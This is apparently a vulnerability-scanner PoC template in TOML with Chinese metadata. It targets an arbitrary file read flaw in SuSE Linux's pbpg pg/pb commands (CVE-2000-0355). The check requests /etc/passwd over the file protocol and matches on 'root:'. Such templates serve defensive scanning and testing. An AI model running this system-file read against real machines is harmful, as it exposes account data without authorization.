[info]
author = "ave"
description = "SuSE Linux pbpg 软件包中的 pg/pb 命令未对输入路径进行有效过滤，本地攻击者可通过传递任意路径参数读取系统敏感文件。"
id = "POC-AVE-2000-0364"
name = "SuSE Linux pbpg 任意文件读取漏洞 PoC"
severity = "high"
tags = ["ave-2000-0364"]
vuln_id = [
    "CVE-2000-0355",
    "AVE-2000-0364",
]

[poc]
logic = "any"

[[poc.requests]]
path = "/etc/passwd"
protocol = "file"

[[poc.requests.matchers]]
expect = true
part = "body"
type = "word"
words = ["root:"]
